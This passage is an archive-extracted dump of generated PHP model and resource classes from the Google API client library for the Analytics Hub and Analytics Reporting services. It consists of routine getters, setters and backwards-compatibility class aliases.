{ return $this->primaryContact; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DataProvider::class, 'Google_Service_AnalyticsHub_DataProvider'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/LinkedResource.php000064400000002174147600400120023733 0ustar00linkedDataset = $linkedDataset; } /** * @return string */ public function getLinkedDataset() { return $this->linkedDataset; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(LinkedResource::class, 'Google_Service_AnalyticsHub_LinkedResource'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/SubscribeDataExchangeResponse.php000064400000002436147600400120026713 0ustar00subscription = $subscription; } /** * @return Subscription */ public function getSubscription() { return $this->subscription; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SubscribeDataExchangeResponse::class, 'Google_Service_AnalyticsHub_SubscribeDataExchangeResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/TestIamPermissionsResponse.php000064400000002312147600400120026330 0ustar00permissions = $permissions; } /** * @return string[] */ public function getPermissions() { return $this->permissions; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(TestIamPermissionsResponse::class, 'Google_Service_AnalyticsHub_TestIamPermissionsResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/RestrictedExportConfig.php000064400000003450147600400120025453 0ustar00enabled = $enabled; } /** * @return bool */ public function getEnabled() { return $this->enabled; } /** * @param bool */ public function setRestrictDirectTableAccess($restrictDirectTableAccess) { $this->restrictDirectTableAccess = $restrictDirectTableAccess; } /** * @return bool */ public function getRestrictDirectTableAccess() { return $this->restrictDirectTableAccess; } /** * @param bool */ public function setRestrictQueryResult($restrictQueryResult) { $this->restrictQueryResult = $restrictQueryResult; } /** * @return bool */ public function getRestrictQueryResult() { return $this->restrictQueryResult; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RestrictedExportConfig::class, 'Google_Service_AnalyticsHub_RestrictedExportConfig'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/OperationMetadata.php000064400000005351147600400120024416 0ustar00apiVersion = $apiVersion; } /** * @return string */ public function getApiVersion() { return $this->apiVersion; } /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setEndTime($endTime) { $this->endTime = $endTime; } /** * @return string */ public function getEndTime() { return $this->endTime; } /** * @param bool */ public function setRequestedCancellation($requestedCancellation) { $this->requestedCancellation = $requestedCancellation; } /** * @return bool */ public function getRequestedCancellation() { return $this->requestedCancellation; } /** * @param string */ public function setStatusMessage($statusMessage) { $this->statusMessage = $statusMessage; } /** * @return string */ public function getStatusMessage() { return $this->statusMessage; } /** * @param string */ public function setTarget($target) { $this->target = $target; } /** * @return string */ public function getTarget() { return $this->target; } /** * @param string */ public function setVerb($verb) { $this->verb = $verb; } /** * @return string */ public function getVerb() { return $this->verb; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(OperationMetadata::class, 'Google_Service_AnalyticsHub_OperationMetadata'); google-api/vendor/google/apiclient-services/src/AnalyticsHub/ListDataExchangesResponse.php000064400000003166147600400120026071 0ustar00dataExchanges = $dataExchanges; } /** * @return DataExchange[] */ public function getDataExchanges() { return $this->dataExchanges; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ListDataExchangesResponse::class, 'Google_Service_AnalyticsHub_ListDataExchangesResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/Resource/Reports.php000064400000003154147600400120025474 0ustar00 * $analyticsreportingService = new Google\Service\AnalyticsReporting(...); * $reports = $analyticsreportingService->reports; * */ class Reports extends \Google\Service\Resource { /** * Returns the Analytics data. (reports.batchGet) * * @param GetReportsRequest $postBody * @param array $optParams Optional parameters. * @return GetReportsResponse */ public function batchGet(GetReportsRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('batchGet', [$params], GetReportsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Reports::class, 'Google_Service_AnalyticsReporting_Resource_Reports'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/Resource/UserActivity.php000064400000003271147600400120026471 0ustar00 * $analyticsreportingService = new Google\Service\AnalyticsReporting(...); * $userActivity = $analyticsreportingService->userActivity; * */ class UserActivity extends \Google\Service\Resource { /** * Returns User Activity data. (userActivity.search) * * @param SearchUserActivityRequest $postBody * @param array $optParams Optional parameters. * @return SearchUserActivityResponse */ public function search(SearchUserActivityRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('search', [$params], SearchUserActivityResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UserActivity::class, 'Google_Service_AnalyticsReporting_Resource_UserActivity'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/SegmentMetricFilter.php000064400000004374147600400120026170 0ustar00comparisonValue = $comparisonValue; } /** * @return string */ public function getComparisonValue() { return $this->comparisonValue; } /** * @param string */ public function setMaxComparisonValue($maxComparisonValue) { $this->maxComparisonValue = $maxComparisonValue; } /** * @return string */ public function getMaxComparisonValue() { return $this->maxComparisonValue; } /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } /** * @param string */ public function setOperator($operator) { $this->operator = $operator; } /** * @return string */ public function getOperator() { return $this->operator; } /** * @param string */ public function setScope($scope) { $this->scope = $scope; } /** * @return string */ public function getScope() { return $this->scope; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SegmentMetricFilter::class, 'Google_Service_AnalyticsReporting_SegmentMetricFilter'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/SegmentSequenceStep.php000064400000003254147600400120026177 0ustar00matchType = $matchType; } /** * @return string */ public function getMatchType() { return $this->matchType; } /** * @param OrFiltersForSegment[] */ public function setOrFiltersForSegment($orFiltersForSegment) { $this->orFiltersForSegment = $orFiltersForSegment; } /** * @return OrFiltersForSegment[] */ public function getOrFiltersForSegment() { return $this->orFiltersForSegment; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SegmentSequenceStep::class, 'Google_Service_AnalyticsReporting_SegmentSequenceStep'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/ReportData.php000064400000010130147600400120024304 0ustar00dataLastRefreshed = $dataLastRefreshed; } /** * @return string */ public function getDataLastRefreshed() { return $this->dataLastRefreshed; } /** * @param string */ public function setEmptyReason($emptyReason) { $this->emptyReason = $emptyReason; } /** * @return string */ public function getEmptyReason() { return $this->emptyReason; } /** * @param bool */ public function setIsDataGolden($isDataGolden) { $this->isDataGolden = $isDataGolden; } /** * @return bool */ public function getIsDataGolden() { return $this->isDataGolden; } /** * @param DateRangeValues[] */ public function setMaximums($maximums) { $this->maximums = $maximums; } /** * @return DateRangeValues[] */ public function getMaximums() { return $this->maximums; } /** * @param DateRangeValues[] */ public function setMinimums($minimums) { $this->minimums = $minimums; } /** * @return DateRangeValues[] */ public function getMinimums() { return $this->minimums; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } /** * @param ReportRow[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return ReportRow[] */ public function getRows() { return $this->rows; } /** * @param string[] */ public function setSamplesReadCounts($samplesReadCounts) { $this->samplesReadCounts = $samplesReadCounts; } /** * @return string[] */ public function getSamplesReadCounts() { return $this->samplesReadCounts; } /** * @param string[] */ public function setSamplingSpaceSizes($samplingSpaceSizes) { $this->samplingSpaceSizes = $samplingSpaceSizes; } /** * @return string[] */ public function getSamplingSpaceSizes() { return $this->samplingSpaceSizes; } /** * @param DateRangeValues[] */ public function setTotals($totals) { $this->totals = $totals; } /** * @return DateRangeValues[] */ public function getTotals() { return $this->totals; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ReportData::class, 'Google_Service_AnalyticsReporting_ReportData'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/PivotHeaderEntry.php000064400000003617147600400120025507 0ustar00dimensionNames = $dimensionNames; } /** * @return string[] */ public function getDimensionNames() { return $this->dimensionNames; } /** * @param string[] */ public function setDimensionValues($dimensionValues) { $this->dimensionValues = $dimensionValues; } /** * @return string[] */ public function getDimensionValues() { return $this->dimensionValues; } /** * @param MetricHeaderEntry */ public function setMetric(MetricHeaderEntry $metric) { $this->metric = $metric; } /** * @return MetricHeaderEntry */ public function getMetric() { return $this->metric; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(PivotHeaderEntry::class, 'Google_Service_AnalyticsReporting_PivotHeaderEntry'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/CohortGroup.php000064400000002776147600400120024533 0ustar00cohorts = $cohorts; } /** * @return Cohort[] */ public function getCohorts() { return $this->cohorts; } /** * @param bool */ public function setLifetimeValue($lifetimeValue) { $this->lifetimeValue = $lifetimeValue; } /** * @return bool */ public function getLifetimeValue() { return $this->lifetimeValue; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CohortGroup::class, 'Google_Service_AnalyticsReporting_CohortGroup'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/GetReportsRequest.php000064400000003216147600400120025715 0ustar00reportRequests = $reportRequests; } /** * @return ReportRequest[] */ public function getReportRequests() { return $this->reportRequests; } /** * @param bool */ public function setUseResourceQuotas($useResourceQuotas) { $this->useResourceQuotas = $useResourceQuotas; } /** * @return bool */ public function getUseResourceQuotas() { return $this->useResourceQuotas; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GetReportsRequest::class, 'Google_Service_AnalyticsReporting_GetReportsRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/EventData.php000064400000004320147600400120024116 0ustar00eventAction = $eventAction; } /** * @return string */ public function getEventAction() { return $this->eventAction; } /** * @param string */ public function setEventCategory($eventCategory) { $this->eventCategory = $eventCategory; } /** * @return string */ public function getEventCategory() { return $this->eventCategory; } /** * @param string */ public function setEventCount($eventCount) { $this->eventCount = $eventCount; } /** * @return string */ public function getEventCount() { return $this->eventCount; } /** * @param string */ public function setEventLabel($eventLabel) { $this->eventLabel = $eventLabel; } /** * @return string */ public function getEventLabel() { return $this->eventLabel; } /** * @param string */ public function setEventValue($eventValue) { $this->eventValue = $eventValue; } /** * @return string */ public function getEventValue() { return $this->eventValue; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(EventData::class, 'Google_Service_AnalyticsReporting_EventData'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/Pivot.php000064400000005214147600400120023347 0ustar00dimensionFilterClauses = $dimensionFilterClauses; } /** * @return DimensionFilterClause[] */ public function getDimensionFilterClauses() { return $this->dimensionFilterClauses; } /** * @param Dimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return Dimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param int */ public function setMaxGroupCount($maxGroupCount) { $this->maxGroupCount = $maxGroupCount; } /** * @return int */ public function getMaxGroupCount() { return $this->maxGroupCount; } /** * @param Metric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return Metric[] */ public function getMetrics() { return $this->metrics; } /** * @param int */ public function setStartGroup($startGroup) { $this->startGroup = $startGroup; } /** * @return int */ public function getStartGroup() { return $this->startGroup; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Pivot::class, 'Google_Service_AnalyticsReporting_Pivot'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/SequenceSegment.php000064400000003451147600400120025342 0ustar00firstStepShouldMatchFirstHit = $firstStepShouldMatchFirstHit; } /** * @return bool */ public function getFirstStepShouldMatchFirstHit() { return $this->firstStepShouldMatchFirstHit; } /** * @param SegmentSequenceStep[] */ public function setSegmentSequenceSteps($segmentSequenceSteps) { $this->segmentSequenceSteps = $segmentSequenceSteps; } /** * @return SegmentSequenceStep[] */ public function getSegmentSequenceSteps() { return $this->segmentSequenceSteps; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SequenceSegment::class, 'Google_Service_AnalyticsReporting_SequenceSegment'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/PivotValueRegion.php000064400000002220147600400120025502 0ustar00values = $values; } /** * @return string[] */ public function getValues() { return $this->values; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(PivotValueRegion::class, 'Google_Service_AnalyticsReporting_PivotValueRegion'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/Dimension.php000064400000002665147600400120024202 0ustar00histogramBuckets = $histogramBuckets; } /** * @return string[] */ public function getHistogramBuckets() { return $this->histogramBuckets; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Dimension::class, 'Google_Service_AnalyticsReporting_Dimension'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/SearchUserActivityResponse.php000064400000004053147600400120027546 0ustar00nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } public function setSampleRate($sampleRate) { $this->sampleRate = $sampleRate; } public function getSampleRate() { return $this->sampleRate; } /** * @param UserActivitySession[] */ public function setSessions($sessions) { $this->sessions = $sessions; } /** * @return UserActivitySession[] */ public function getSessions() { return $this->sessions; } /** * @param int */ public function setTotalRows($totalRows) { $this->totalRows = $totalRows; } /** * @return int */ public function getTotalRows() { return $this->totalRows; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SearchUserActivityResponse::class, 'Google_Service_AnalyticsReporting_SearchUserActivityResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/ColumnHeader.php000064400000003102147600400120024606 0ustar00dimensions = $dimensions; } /** * @return string[] */ public function getDimensions() { return $this->dimensions; } /** * @param MetricHeader */ public function setMetricHeader(MetricHeader $metricHeader) { $this->metricHeader = $metricHeader; } /** * @return MetricHeader */ public function getMetricHeader() { return $this->metricHeader; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ColumnHeader::class, 'Google_Service_AnalyticsReporting_ColumnHeader'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/Report.php000064400000003532147600400120023522 0ustar00columnHeader = $columnHeader; } /** * @return ColumnHeader */ public function getColumnHeader() { return $this->columnHeader; } /** * @param ReportData */ public function setData(ReportData $data) { $this->data = $data; } /** * @return ReportData */ public function getData() { return $this->data; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Report::class, 'Google_Service_AnalyticsReporting_Report'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/DateRange.php000064400000002534147600400120024102 0ustar00endDate = $endDate; } /** * @return string */ public function getEndDate() { return $this->endDate; } /** * @param string */ public function setStartDate($startDate) { $this->startDate = $startDate; } /** * @return string */ public function getStartDate() { return $this->startDate; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DateRange::class, 'Google_Service_AnalyticsReporting_DateRange'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/DynamicSegment.php000064400000003700147600400120025153 0ustar00name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param SegmentDefinition */ public function setSessionSegment(SegmentDefinition $sessionSegment) { $this->sessionSegment = $sessionSegment; } /** * @return SegmentDefinition */ public function getSessionSegment() { return $this->sessionSegment; } /** * @param SegmentDefinition */ public function setUserSegment(SegmentDefinition $userSegment) { $this->userSegment = $userSegment; } /** * @return SegmentDefinition */ public function getUserSegment() { return $this->userSegment; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DynamicSegment::class, 'Google_Service_AnalyticsReporting_DynamicSegment'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/PivotHeader.php000064400000003311147600400120024454 0ustar00pivotHeaderEntries = $pivotHeaderEntries; } /** * @return PivotHeaderEntry[] */ public function getPivotHeaderEntries() { return $this->pivotHeaderEntries; } /** * @param int */ public function setTotalPivotGroupsCount($totalPivotGroupsCount) { $this->totalPivotGroupsCount = $totalPivotGroupsCount; } /** * @return int */ public function getTotalPivotGroupsCount() { return $this->totalPivotGroupsCount; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(PivotHeader::class, 'Google_Service_AnalyticsReporting_PivotHeader'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/MetricHeaderEntry.php000064400000002474147600400120025631 0ustar00name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MetricHeaderEntry::class, 'Google_Service_AnalyticsReporting_MetricHeaderEntry'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/UserActivitySession.php000064400000005213147600400120026244 0ustar00activities = $activities; } /** * @return Activity[] */ public function getActivities() { return $this->activities; } /** * @param string */ public function setDataSource($dataSource) { $this->dataSource = $dataSource; } /** * @return string */ public function getDataSource() { return $this->dataSource; } /** * @param string */ public function setDeviceCategory($deviceCategory) { $this->deviceCategory = $deviceCategory; } /** * @return string */ public function getDeviceCategory() { return $this->deviceCategory; } /** * @param string */ public function setPlatform($platform) { $this->platform = $platform; } /** * @return string */ public function getPlatform() { return $this->platform; } /** * @param string */ public function setSessionDate($sessionDate) { $this->sessionDate = $sessionDate; } /** * @return string */ public function getSessionDate() { return $this->sessionDate; } /** * @param string */ public function setSessionId($sessionId) { $this->sessionId = $sessionId; } /** * @return string */ public function getSessionId() { return $this->sessionId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UserActivitySession::class, 'Google_Service_AnalyticsReporting_UserActivitySession'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/PageviewData.php000064400000002554147600400120024613 0ustar00pagePath = $pagePath; } /** * @return string */ public function getPagePath() { return $this->pagePath; } /** * @param string */ public function setPageTitle($pageTitle) { $this->pageTitle = $pageTitle; } /** * @return string */ public function getPageTitle() { return $this->pageTitle; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(PageviewData::class, 'Google_Service_AnalyticsReporting_PageviewData'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/TransactionData.php000064400000003506147600400120025327 0ustar00transactionId = $transactionId; } /** * @return string */ public function getTransactionId() { return $this->transactionId; } public function setTransactionRevenue($transactionRevenue) { $this->transactionRevenue = $transactionRevenue; } public function getTransactionRevenue() { return $this->transactionRevenue; } public function setTransactionShipping($transactionShipping) { $this->transactionShipping = $transactionShipping; } public function getTransactionShipping() { return $this->transactionShipping; } public function setTransactionTax($transactionTax) { $this->transactionTax = $transactionTax; } public function getTransactionTax() { return $this->transactionTax; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(TransactionData::class, 'Google_Service_AnalyticsReporting_TransactionData'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/EcommerceData.php000064400000004340147600400120024736 0ustar00actionType = $actionType; } /** * @return string */ public function getActionType() { return $this->actionType; } /** * @param string */ public function setEcommerceType($ecommerceType) { $this->ecommerceType = $ecommerceType; } /** * @return string */ public function getEcommerceType() { return $this->ecommerceType; } /** * @param ProductData[] */ public function setProducts($products) { $this->products = $products; } /** * @return ProductData[] */ public function getProducts() { return $this->products; } /** * @param TransactionData */ public function setTransaction(TransactionData $transaction) { $this->transaction = $transaction; } /** * @return TransactionData */ public function getTransaction() { return $this->transaction; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(EcommerceData::class, 'Google_Service_AnalyticsReporting_EcommerceData'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/DimensionFilterClause.php000064400000003043147600400120026474 0ustar00filters = $filters; } /** * @return DimensionFilter[] */ public function getFilters() { return $this->filters; } /** * @param string */ public function setOperator($operator) { $this->operator = $operator; } /** * @return string */ public function getOperator() { return $this->operator; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DimensionFilterClause::class, 'Google_Service_AnalyticsReporting_DimensionFilterClause'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/ScreenviewData.php000064400000004021147600400120025145 0ustar00appName = $appName; } /** * @return string */ public function getAppName() { return $this->appName; } /** * @param string */ public function setMobileDeviceBranding($mobileDeviceBranding) { $this->mobileDeviceBranding = $mobileDeviceBranding; } /** * @return string */ public function getMobileDeviceBranding() { return $this->mobileDeviceBranding; } /** * @param string */ public function setMobileDeviceModel($mobileDeviceModel) { $this->mobileDeviceModel = $mobileDeviceModel; } /** * @return string */ public function getMobileDeviceModel() { return $this->mobileDeviceModel; } /** * @param string */ public function setScreenName($screenName) { $this->screenName = $screenName; } /** * @return string */ public function getScreenName() { return $this->screenName; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ScreenviewData::class, 'Google_Service_AnalyticsReporting_ScreenviewData'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/User.php000064400000002443147600400120023165 0ustar00type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUserId($userId) { $this->userId = $userId; } /** * @return string */ public function getUserId() { return $this->userId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(User::class, 'Google_Service_AnalyticsReporting_User'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/ReportRow.php000064400000003023147600400120024205 0ustar00dimensions = $dimensions; } /** * @return string[] */ public function getDimensions() { return $this->dimensions; } /** * @param DateRangeValues[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return DateRangeValues[] */ public function getMetrics() { return $this->metrics; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ReportRow::class, 'Google_Service_AnalyticsReporting_ReportRow'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/SimpleSegment.php000064400000002615147600400120025024 0ustar00orFiltersForSegment = $orFiltersForSegment; } /** * @return OrFiltersForSegment[] */ public function getOrFiltersForSegment() { return $this->orFiltersForSegment; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SimpleSegment::class, 'Google_Service_AnalyticsReporting_SimpleSegment'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/OrderBy.php000064400000003161147600400120023613 0ustar00fieldName = $fieldName; } /** * @return string */ public function getFieldName() { return $this->fieldName; } /** * @param string */ public function setOrderType($orderType) { $this->orderType = $orderType; } /** * @return string */ public function getOrderType() { return $this->orderType; } /** * @param string */ public function setSortOrder($sortOrder) { $this->sortOrder = $sortOrder; } /** * @return string */ public function getSortOrder() { return $this->sortOrder; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(OrderBy::class, 'Google_Service_AnalyticsReporting_OrderBy'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/Cohort.php000064400000003217147600400120023505 0ustar00dateRange = $dateRange; } /** * @return DateRange */ public function getDateRange() { return $this->dateRange; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Cohort::class, 'Google_Service_AnalyticsReporting_Cohort'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/GetReportsResponse.php000064400000004054147600400120026064 0ustar00queryCost = $queryCost; } /** * @return int */ public function getQueryCost() { return $this->queryCost; } /** * @param Report[] */ public function setReports($reports) { $this->reports = $reports; } /** * @return Report[] */ public function getReports() { return $this->reports; } /** * @param ResourceQuotasRemaining */ public function setResourceQuotasRemaining(ResourceQuotasRemaining $resourceQuotasRemaining) { $this->resourceQuotasRemaining = $resourceQuotasRemaining; } /** * @return ResourceQuotasRemaining */ public function getResourceQuotasRemaining() { return $this->resourceQuotasRemaining; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GetReportsResponse::class, 'Google_Service_AnalyticsReporting_GetReportsResponse'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/SearchUserActivityRequest.php000064400000005207147600400120027402 0ustar00activityTypes = $activityTypes; } /** * @return string[] */ public function getActivityTypes() { return $this->activityTypes; } /** * @param DateRange */ public function setDateRange(DateRange $dateRange) { $this->dateRange = $dateRange; } /** * @return DateRange */ public function getDateRange() { return $this->dateRange; } /** * @param int */ public function setPageSize($pageSize) { $this->pageSize = $pageSize; } /** * @return int */ public function getPageSize() { return $this->pageSize; } /** * @param string */ public function setPageToken($pageToken) { $this->pageToken = $pageToken; } /** * @return string */ public function getPageToken() { return $this->pageToken; } /** * @param User */ public function setUser(User $user) { $this->user = $user; } /** * @return User */ public function getUser() { return $this->user; } /** * @param string */ public function setViewId($viewId) { $this->viewId = $viewId; } /** * @return string */ public function getViewId() { return $this->viewId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SearchUserActivityRequest::class, 'Google_Service_AnalyticsReporting_SearchUserActivityRequest'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/SegmentDimensionFilter.php000064400000005264147600400120026671 0ustar00caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } /** * @param string[] */ public function setExpressions($expressions) { $this->expressions = $expressions; } /** * @return string[] */ public function getExpressions() { return $this->expressions; } /** * @param string */ public function setMaxComparisonValue($maxComparisonValue) { $this->maxComparisonValue = $maxComparisonValue; } /** * @return string */ public function getMaxComparisonValue() { return $this->maxComparisonValue; } /** * @param string */ public function setMinComparisonValue($minComparisonValue) { $this->minComparisonValue = $minComparisonValue; } /** * @return string */ public function getMinComparisonValue() { return $this->minComparisonValue; } /** * @param string */ public function setOperator($operator) { $this->operator = $operator; } /** * @return string */ public function getOperator() { return $this->operator; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SegmentDimensionFilter::class, 'Google_Service_AnalyticsReporting_SegmentDimensionFilter'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/MetricFilterClause.php000064400000003016147600400120025772 0ustar00filters = $filters; } /** * @return MetricFilter[] */ public function getFilters() { return $this->filters; } /** * @param string */ public function setOperator($operator) { $this->operator = $operator; } /** * @return string */ public function getOperator() { return $this->operator; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MetricFilterClause::class, 'Google_Service_AnalyticsReporting_MetricFilterClause'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/ResourceQuotasRemaining.php000064400000003151147600400120027062 0ustar00dailyQuotaTokensRemaining = $dailyQuotaTokensRemaining; } /** * @return int */ public function getDailyQuotaTokensRemaining() { return $this->dailyQuotaTokensRemaining; } /** * @param int */ public function setHourlyQuotaTokensRemaining($hourlyQuotaTokensRemaining) { $this->hourlyQuotaTokensRemaining = $hourlyQuotaTokensRemaining; } /** * @return int */ public function getHourlyQuotaTokensRemaining() { return $this->hourlyQuotaTokensRemaining; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ResourceQuotasRemaining::class, 'Google_Service_AnalyticsReporting_ResourceQuotasRemaining'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/ProductData.php000064400000003573147600400120024466 0ustar00itemRevenue = $itemRevenue; } public function getItemRevenue() { return $this->itemRevenue; } /** * @param string */ public function setProductName($productName) { $this->productName = $productName; } /** * @return string */ public function getProductName() { return $this->productName; } /** * @param string */ public function setProductQuantity($productQuantity) { $this->productQuantity = $productQuantity; } /** * @return string */ public function getProductQuantity() { return $this->productQuantity; } /** * @param string */ public function setProductSku($productSku) { $this->productSku = $productSku; } /** * @return string */ public function getProductSku() { return $this->productSku; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProductData::class, 'Google_Service_AnalyticsReporting_ProductData'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/SegmentDefinition.php000064400000002517147600400120025664 0ustar00segmentFilters = $segmentFilters; } /** * @return SegmentFilter[] */ public function getSegmentFilters() { return $this->segmentFilters; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(SegmentDefinition::class, 'Google_Service_AnalyticsReporting_SegmentDefinition'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/DimensionFilter.php000064400000004344147600400120025344 0ustar00caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } /** * @param string[] */ public function setExpressions($expressions) { $this->expressions = $expressions; } /** * @return string[] */ public function getExpressions() { return $this->expressions; } /** * @param bool */ public function setNot($not) { $this->not = $not; } /** * @return bool */ public function getNot() { return $this->not; } /** * @param string */ public function setOperator($operator) { $this->operator = $operator; } /** * @return string */ public function getOperator() { return $this->operator; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(DimensionFilter::class, 'Google_Service_AnalyticsReporting_DimensionFilter'); google-api/vendor/google/apiclient-services/src/AnalyticsReporting/ReportRequest.php000064400000015164147600400120025077 0ustar00cohortGroup = $cohortGroup; } /** * @return CohortGroup */ public function getCohortGroup() { return $this->cohortGroup; } /** * @param DateRange[] */ public function setDateRanges($dateRanges) { $this->dateRanges = $dateRanges; } /** * @return DateRange[] */ public function getDateRanges() { return $this->dateRanges; } /** * @param DimensionFilterClause[] */ public function setDimensionFilterClauses($dimensionFilterClauses) { $this->dimensionFilterClauses = $dimensionFilterClauses; } /** * @return DimensionFilterClause[] */ public function getDimensionFilterClauses() { return $this->dimensionFilterClauses; } /** * @param Dimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return Dimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setFiltersExpression($filtersExpression) { $this->filtersExpression = $filtersExpression; } /** * @return string */ public function 